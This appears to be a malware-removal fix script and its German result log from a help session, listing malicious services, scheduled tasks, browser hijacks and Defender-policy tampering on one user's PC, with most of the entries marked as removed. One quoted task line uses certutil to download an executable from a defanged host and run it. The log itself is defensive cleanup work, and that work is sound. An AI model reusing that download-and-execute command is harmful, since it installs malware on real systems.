FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
